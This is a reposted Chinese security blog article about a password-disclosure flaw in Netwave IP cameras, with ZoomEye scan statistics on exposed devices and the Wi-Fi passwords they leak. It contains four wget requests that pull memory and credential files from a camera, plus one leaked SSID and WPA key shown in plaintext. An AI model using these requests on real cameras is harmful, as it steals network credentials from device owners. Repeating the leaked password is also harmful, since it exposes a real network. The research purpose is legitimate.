记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

我是如何通过网络摄像头分析wifi密码的

2017-02-26 01:55

Author:MyKings(知道创宇404实验室)

看到 exploit-db.com 中报了一个《Netwave IP Camera – Password Disclosure》漏洞, 这个漏洞包含了wifi密码与Web的账号泄露。

顺便使用了 zoomeye 搜索了下全球的这款网络摄像头, 发现用这个还挺多的。

1 背景

1.1 漏洞分析

  • wget -qO- http://[HOST]:[PORT]//proc/kcore | strings
  • wget -qO- http://[HOST]:[PORT]//etc/RT2870STA.dat
  • wget -qO- http://[HOST]:[PORT]//dev/rom0
  • wget -qO- http://[HOST]:[PORT]/get_status.cgi

1.1.1 get_status.cgi

会泄露当前网络摄像头的一些配置信息:

var sys_ver='21.37.2.47'; 
var app_ver='0.0.4.19'; 
var alias='002voam'; 
var now=1486976881; 
var tz=-28800; 
var alarm_status=0; 
var ddns_status=0; 
var ddns_host=''; 
var oray_type=0; 
var upnp_status=0; 
var p2p_status=0; 
var p2p_local_port=20409; 
var msn_status=0; 
var wifi_status=0; 
var temperature=0.0; 
var humidity=0; 
var tridro_error='';

1.1.2 /etc/RT2870STA.dat

这里文件就是一个配置文件, 这里可以得到SSID与wifi密码。

[Default]
SSID=hang yue office
NetworkType=Infra
Channel=0
AuthMode=WPA2PSK
EncrypType=AES
WPAPSK=hangyuewifi

1.1.3 /proc/kcore

内存的map, 可以直接使用wget下载下来(需要注意这里要把wget进程结束才可以登录)。

kcore

2 区域分布

先来看一张使用 ZoomEye 搜索的结果, 可以看到搜索到 315,129 条。

map_zoomeye

通过筛选分析后 11186 IP中存在包含wifi密码, 其中覆盖了111个国家和地区。

这里近分析了中国香港地区的摄像头:

  • 无wifi密码962个
  • WEP加密方式728个
  • WPAPSK加密方式9496个

查询看密码

密码类型统计

  • 存数字 1807 个
  • 存字母 1405 个
  • 字母+数字 5585 个
  • 含特殊字符 1001 个
  • 密码用的最多TOP 10

密码用的最多TOP 10

psd_cnt-3

密码长度统计

psd_len-2

看的出大众还是使用8位、10位的密码较多。

hk

附上一张香港分析后的图, 红色代表没有密码的wifi, 黄色代表WEP加密方式, 蓝色代表WPAPSK方式。

map_word

这个世界范围内存在摄像头密码泄漏的分布图。

vul_image

这张图示是根据SSID搜索到的一家公司内的IP摄像头截图。

3 参考链接

 

*转载请注明来自MottoIN

知识来源: www.mottoin.com/96950.html

阅读:475368 | 评论:0 | 标签:终端安全 wifi密码 网络摄像头分析

想收藏或者和大家分享这篇好文章→复制链接地址

“我是如何通过网络摄像头分析wifi密码的”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云